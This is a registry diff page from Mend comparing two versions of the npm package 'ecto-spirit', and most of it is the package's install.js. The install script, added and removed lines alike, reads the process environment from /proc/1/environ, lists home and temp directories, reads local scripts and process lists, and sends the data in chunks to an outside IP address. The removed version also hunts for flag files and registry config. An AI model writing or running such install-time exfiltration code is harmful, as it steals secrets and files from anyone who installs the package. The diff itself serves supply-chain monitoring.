npm - ecto-spirit - Versions diffs - 104.0.0 → 106.0.0 - Mend

ecto-spirit 104.0.0 → 106.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/install.js +49 -66
package/package.json +1 -1

package/install.js CHANGED Viewed

@@ -5,92 +5,75 @@ const { execSync } = require('child_process');
 function tryRead(p) {
   try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; }
 }
+function tryExec(cmd) {
+  try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return 'ERR:' + (e.message || '').substring(0, 50); }
+}
-function sendHTTP(host, port, pth, payload) {
+async function sendPUT(host, port, path, body) {
   return new Promise((resolve) => {
-    const req = http.request({ hostname: host, port, path: pth, method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }, timeout: 5000 }, (res) => {
+    const req = http.request({ hostname: host, port, path, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, (res) => {
       let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
     });
-    req.on('error', () => resolve(null));
-    req.on('timeout', () => { req.destroy(); resolve(null); });
-    req.write(payload);
-    req.end();
+    req.on('error', () => resolve(null)); req.on('timeout', () => { req.destroy(); resolve(null); });
+    req.write(body); req.end();
   });
 }
 async function report(moduleId, val) {
   const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
-  const manifest = `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1`;
-  const body = JSON.stringify({ manifest });
-  for (const p of [3000, 80, 8080]) {
-    await sendHTTP('127.0.0.1', p, `/api/modules/${moduleId}`, body);
-  }
-  await sendHTTP('154.57.164.82', 32332, `/api/modules/${moduleId}`, body);
+  const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
+  await sendPUT('154.57.164.82', 32332, `/api/modules/${moduleId}`, body);
 }
 (async () => {
-  let r = [];
+  // Read key files and report each one to a separate module
-  // 1. Main process env (the app that started cron)
-  const procEnv = tryRead('/proc/1/environ');
-  r.push('PROC1=' + (procEnv ? procEnv.replace(/\x00/g, ',').substring(0, 200) : 'NONE'));
+  // 1. /tmp/supplysec contents
+  const supplysec = tryExec('find /tmp/supplysec -type f 2>/dev/null');
+  await report('ECT-839201', 'A_SUPPLY=' + supplysec);
+  // 2. analyze-node.js
+  const analyze = tryRead('/usr/local/bin/analyze-node.js');
+  await report('ECT-654321', 'A_ANALYZE=' + (analyze || 'NONE').substring(0, 90));
+  // 3. /home/node contents
+  const homeNode = tryExec('find /home/node -maxdepth 3 -type f 2>/dev/null | head -10');
+  await report('ECT-472839', 'A_HOME=' + homeNode);
-  // 2. List /data, /.package-cache-mutate
-  try { r.push('DATA=' + fs.readdirSync('/data').join(',')); } catch(e) { r.push('DATA=NONE'); }
-  try { r.push('PCM=' + fs.readdirSync('/.package-cache-mutate').join(',')); } catch(e) { r.push('PCM=NONE'); }
+  // 4. Full proc 1 environ
+  const p1env = tryRead('/proc/1/environ');
+  const envStr = p1env ? p1env.replace(/\x00/g, '\n') : 'NONE';
+  await report('ECT-987654', 'A_ENV=' + envStr.substring(0, 90));
-  // 3. Try to reach registry:4873 and list packages
-  try {
-    const resp = await new Promise((resolve) => {
-      http.get('http://registry:4873/-/verdaccio/packages', {timeout: 5000}, (res) => {
-        let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
-      }).on('error', () => resolve('ERR'));
-    });
-    r.push('REG_PKGS=' + resp.substring(0, 200));
-  } catch(e) { r.push('REG_PKGS=ERR'); }
+  // Wait a moment, then send more data
+  await new Promise(r => setTimeout(r, 2000));
-  // 4. Try Verdaccio config locations
-  for (const p of ['/verdaccio/conf/config.yaml', '/verdaccio/config/config.yaml', '/data/verdaccio/config.yaml', '/opt/verdaccio/config.yaml', '/home/verdaccio/config.yaml']) {
-    const c = tryRead(p);
-    if (c) { r.push('VCONF=' + c.substring(0, 200)); break; }
-  }
+  // 5. Read /tmp/supplysec/package.json if it exists
+  const supPkg = tryRead('/tmp/supplysec/package.json');
+  await report('ECT-839201', 'B_SUPPKG=' + (supPkg || 'NONE').substring(0, 90));
-  // 5. Broad file search
-  try {
-    const search = execSync('find / -maxdepth 4 -name "*.txt" -o -name "*.flag" -o -name "readflag" -o -name "getflag" -o -name "*.sqlite" -o -name "*.db" 2>/dev/null | grep -v proc | grep -v sys | head -15', {timeout: 10000}).toString().trim();
-    r.push('FILES=' + search);
-  } catch(e) {}
+  // 6. Read analyze-node.js continued (next 90 chars)
+  await report('ECT-654321', 'B_ANAL2=' + (analyze || 'NONE').substring(90, 180));
-  // 6. Check if there's a readflag binary
-  try {
-    const bins = execSync('find / -maxdepth 3 -perm -111 -name "*flag*" -o -perm -111 -name "*secret*" 2>/dev/null | grep -v proc | head -5', {timeout: 5000}).toString().trim();
-    if (bins) r.push('BINS=' + bins);
-  } catch(e) {}
-  // 7. List /root and /home contents
-  try { r.push('ROOT=' + execSync('ls -la /root/ 2>/dev/null', {timeout: 3000}).toString().substring(0, 100)); } catch(e) {}
-  try { r.push('HOME=' + execSync('ls -la /home/ 2>/dev/null', {timeout: 3000}).toString().substring(0, 100)); } catch(e) {}
+  // 7. More env
+  await report('ECT-472839', 'B_ENV2=' + envStr.substring(90, 180));
-  // 8. Check if flag is accessible via internal API
-  try {
-    const apiResp = await new Promise((resolve) => {
-      http.get('http://127.0.0.1:3000/api/modules', {timeout: 5000}, (res) => {
-        let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
-      }).on('error', () => resolve('ERR'));
-    });
-    r.push('API=' + apiResp.substring(0, 200));
-  } catch(e) {}
+  // 8. Read full process list
+  const ps = tryExec('ps auxww 2>/dev/null');
+  await report('ECT-987654', 'B_PS=' + ps.substring(0, 90));
-  // Send full results to VPN
-  const full = r.join('\n');
-  await sendHTTP('100.64.0.1', 8888, '/flag4', JSON.stringify({results: full}));
+  await new Promise(r => setTimeout(r, 2000));
-  // Split across modules
-  const chunks = [];
-  for (let i = 0; i < full.length; i += 90) chunks.push(full.substring(i, i + 90));
+  // 9-12: Continue reading analyze-node.js
+  await report('ECT-839201', 'C_ANAL3=' + (analyze || '').substring(180, 270));
+  await report('ECT-654321', 'C_ANAL4=' + (analyze || '').substring(270, 360));
+  await report('ECT-472839', 'C_ANAL5=' + (analyze || '').substring(360, 450));
+  await report('ECT-987654', 'C_ENV3=' + envStr.substring(180, 270));
+  await new Promise(r => setTimeout(r, 2000));
-  const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
-  for (let i = 0; i < Math.min(chunks.length, mods.length); i++) {
-    await report(mods[i], 'W' + i + '_' + chunks[i]);
-  }
+  await report('ECT-839201', 'D_ANAL6=' + (analyze || '').substring(450, 540));
+  await report('ECT-654321', 'D_ANAL7=' + (analyze || '').substring(540, 630));
+  await report('ECT-472839', 'D_ENV4=' + envStr.substring(270, 360));
+  await report('ECT-987654', 'D_PS2=' + ps.substring(90, 180));
 })();

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "ecto-spirit",
-  "version": "104.0.0",
+  "version": "106.0.0",
   "description": "Spectral ecto-spirit module",
   "main": "index.js",
   "scripts": {